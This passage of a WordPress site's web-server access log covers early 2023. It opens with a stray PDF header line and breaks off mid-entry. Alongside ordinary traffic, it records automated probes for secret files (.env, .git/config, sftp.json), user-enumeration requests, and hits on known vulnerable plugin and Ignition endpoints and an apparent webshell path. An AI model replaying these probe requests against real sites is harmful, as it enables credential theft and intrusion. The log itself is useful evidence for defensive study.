%PDF-1.4
Directory : /var/www/vhosts/lautnusantara.com/logs/wp.lautnusantara.com/ |
23.178.112.106 - - [27/Jan/2023:11:51:11 +0700] "GET /.well-known/acme-challenge/tNMogkMwFrg_9NyRsPRKEvnU1dbYbHnIW1ld3pGlB7c HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 3.18.109.209 - - [27/Jan/2023:11:51:11 +0700] "GET /.well-known/acme-challenge/tNMogkMwFrg_9NyRsPRKEvnU1dbYbHnIW1ld3pGlB7c HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 54.186.78.121 - - [27/Jan/2023:11:51:11 +0700] "GET /.well-known/acme-challenge/tNMogkMwFrg_9NyRsPRKEvnU1dbYbHnIW1ld3pGlB7c HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 51.81.167.146 - - [27/Jan/2023:11:51:39 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 Safari/604.1" 207.241.235.249 - - [27/Jan/2023:11:51:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" 142.93.12.24 - - [27/Jan/2023:11:52:22 +0700] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (compatible; Domains Project/1.3.7; +https://domainsproject.org)" 159.65.54.69 - - [27/Jan/2023:11:52:35 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /.DS_Store HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /.vscode/sftp.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA084446) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1738.98 Mobile Safari/537.3" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /info.php HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /telescope/requests HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /s/434323e223e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /server-status HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /api/search?folderIds=0 HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /about HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /login.action HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /v2/_catalog HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 159.65.54.69 - - [27/Jan/2023:11:52:36 +0700] "GET /config.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 205.169.39.63 - - [27/Jan/2023:11:52:46 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/104.0.5112.101 Safari/537.36" 148.113.143.236 - - [27/Jan/2023:11:53:53 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36" 51.75.141.254 - - [27/Jan/2023:11:55:01 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" 185.108.105.166 - - [27/Jan/2023:11:55:01 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1" 84.247.50.238 - - [27/Jan/2023:11:55:01 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 103.55.39.187 - - [27/Jan/2023:11:55:01 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1" 197.242.159.110 - - [27/Jan/2023:11:55:02 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" 51.75.141.254 - - [27/Jan/2023:11:55:04 +0700] "OPTIONS / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0" 197.242.159.110 - - [27/Jan/2023:11:55:05 +0700] "GET / HTTP/1.1" 301 162 "http://wp.lautnusantara.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1" 103.82.15.162 - - [27/Jan/2023:16:30:50 +0700] "GET /wp-admin HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 162.142.125.210 - - [27/Jan/2023:18:43:20 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 87.236.176.165 - - [28/Jan/2023:17:29:33 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 212.83.128.29 - - [28/Jan/2023:23:12:14 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 212.83.128.29 - - [28/Jan/2023:23:12:18 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 212.83.128.29 - - [28/Jan/2023:23:12:22 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 51.255.62.7 - - [29/Jan/2023:07:41:14 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0" 179.43.190.234 - - [30/Jan/2023:13:58:51 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 179.43.190.234 - - [30/Jan/2023:13:58:55 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 179.43.190.234 - - [30/Jan/2023:13:58:59 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 167.94.138.61 - - [01/Feb/2023:08:00:52 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 205.210.31.43 - - [04/Feb/2023:12:29:10 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 43.135.172.53 - - [06/Feb/2023:02:48:27 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 43.153.102.176 - - [06/Feb/2023:06:59:47 +0700] "GET /wp-admin/css/ HTTP/1.1" 301 162 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 92.205.22.243 - - [08/Feb/2023:00:29:01 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 92.205.22.243 - - [08/Feb/2023:00:29:05 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 92.205.22.243 - - [08/Feb/2023:00:29:08 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 43.153.48.241 - - [08/Feb/2023:05:00:48 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 198.235.24.44 - - [08/Feb/2023:15:52:52 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 43.153.3.67 - - [09/Feb/2023:02:53:33 +0700] "GET /wp-admin/css/ HTTP/1.1" 301 162 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 43.153.3.67 - - [09/Feb/2023:07:43:02 +0700] "GET /wp-admin/css/ HTTP/1.1" 301 162 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 67.222.131.158 - - [11/Feb/2023:23:51:31 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 67.222.131.158 - - [11/Feb/2023:23:51:36 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 67.222.131.158 - - [11/Feb/2023:23:51:41 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 205.210.31.184 - - [12/Feb/2023:10:44:28 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 43.153.64.123 - - [13/Feb/2023:03:15:18 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 43.153.3.67 - - [14/Feb/2023:00:40:44 +0700] "GET /wp-admin/css/ HTTP/1.1" 301 162 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 43.153.100.114 - - [15/Feb/2023:12:10:40 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 147.78.47.249 - - [16/Feb/2023:06:10:06 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 147.78.47.249 - - [16/Feb/2023:06:10:10 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 147.78.47.249 - - [16/Feb/2023:06:10:13 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 147.78.47.249 - - [16/Feb/2023:06:10:16 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 162.214.94.65 - - [16/Feb/2023:07:16:05 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 162.214.94.65 - - [16/Feb/2023:07:16:11 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 162.214.94.65 - - [16/Feb/2023:07:16:14 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 205.210.31.49 - - [17/Feb/2023:13:22:35 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 65.155.30.101 - - [17/Feb/2023:16:39:52 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.71 Safari/537.36" 43.153.120.49 - - [18/Feb/2023:03:17:28 +0700] "GET /wp-admin/css/ HTTP/1.1" 301 162 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 198.235.24.9 - - [19/Feb/2023:22:19:31 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 205.210.31.173 - - [22/Feb/2023:09:26:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 103.171.180.165 - - [23/Feb/2023:01:42:20 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 103.171.180.165 - - [23/Feb/2023:01:42:24 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 103.171.180.165 - - [23/Feb/2023:01:42:27 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 198.235.24.28 - - [25/Feb/2023:06:30:11 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 205.210.31.56 - - [25/Feb/2023:12:40:29 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 35.212.163.212 - - [25/Feb/2023:17:20:45 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.212.163.212 - - [25/Feb/2023:17:20:49 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.212.163.212 - - [25/Feb/2023:17:20:51 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.212.163.212 - - [25/Feb/2023:17:20:51 +0700] "GET /shop/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.212.163.212 - - [25/Feb/2023:17:20:51 +0700] "GET /checkout/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 147.78.47.249 - - [26/Feb/2023:03:44:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html)" 147.78.47.249 - - [26/Feb/2023:03:45:10 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 103.171.180.165 - - [28/Feb/2023:11:30:29 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 103.171.180.165 - - [28/Feb/2023:11:30:33 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 103.171.180.165 - - [28/Feb/2023:11:30:35 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 43.130.151.34 - - [01/Mar/2023:01:47:53 +0700] "GET //wp-content/themes/seotheme/db.php?u HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 195.201.123.223 - - [01/Mar/2023:07:40:31 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 4.246.205.75 - - [01/Mar/2023:10:49:41 +0700] "GET /wordpress/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 4.246.205.75 - - [01/Mar/2023:10:49:43 +0700] "GET /wp/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 4.246.205.75 - - [01/Mar/2023:10:49:45 +0700] "GET /blog/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 4.246.205.75 - - [01/Mar/2023:10:49:47 +0700] "GET /old/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 4.246.205.75 - - [01/Mar/2023:10:49:49 +0700] "GET /new/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 4.246.205.75 - - [01/Mar/2023:10:49:51 +0700] "GET /test/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 4.246.205.75 - - [01/Mar/2023:10:49:53 +0700] "GET /backup/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 4.246.205.75 - - [01/Mar/2023:10:49:55 +0700] "GET /temp/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 4.246.205.75 - - [01/Mar/2023:10:49:57 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 87.236.176.120 - - [02/Mar/2023:17:04:51 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 135.181.206.245 - - [02/Mar/2023:22:33:27 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 167.248.133.44 - - [03/Mar/2023:22:41:31 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 205.210.31.176 - - [04/Mar/2023:01:30:18 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 43.153.10.201 - - [04/Mar/2023:22:10:23 +0700] "GET /wp-admin/css/ HTTP/1.1" 301 162 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 147.78.47.249 - - [05/Mar/2023:21:17:00 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [05/Mar/2023:21:17:03 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [05/Mar/2023:21:17:07 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [05/Mar/2023:21:17:10 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 198.235.24.60 - - [06/Mar/2023:00:52:32 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 205.210.31.33 - - [08/Mar/2023:00:45:46 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 43.130.152.151 - - [08/Mar/2023:06:55:50 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 167.94.138.46 - - [08/Mar/2023:22:02:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 170.106.188.112 - - [09/Mar/2023:19:05:17 +0700] "GET /wp-admin/css/ HTTP/1.1" 301 162 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" 51.79.144.41 - - [11/Mar/2023:14:57:19 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 51.79.144.41 - - [11/Mar/2023:14:57:29 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 51.79.144.41 - - [11/Mar/2023:14:57:35 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" 147.78.47.249 - - [13/Mar/2023:20:33:10 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [13/Mar/2023:20:33:15 +0700] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [13/Mar/2023:20:33:18 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [13/Mar/2023:20:33:23 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 205.210.31.169 - - [15/Mar/2023:03:32:37 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 157.245.201.208 - - [15/Mar/2023:23:36:51 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 165.22.248.59 - - [19/Mar/2023:22:55:47 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 65.109.232.182 - - [21/Mar/2023:10:38:55 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 147.78.47.249 - - [21/Mar/2023:18:39:54 +0700] "GET /_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [21/Mar/2023:18:39:57 +0700] "GET /public/_ignition/health-check/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 147.78.47.249 - - [21/Mar/2023:18:40:00 +0700] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 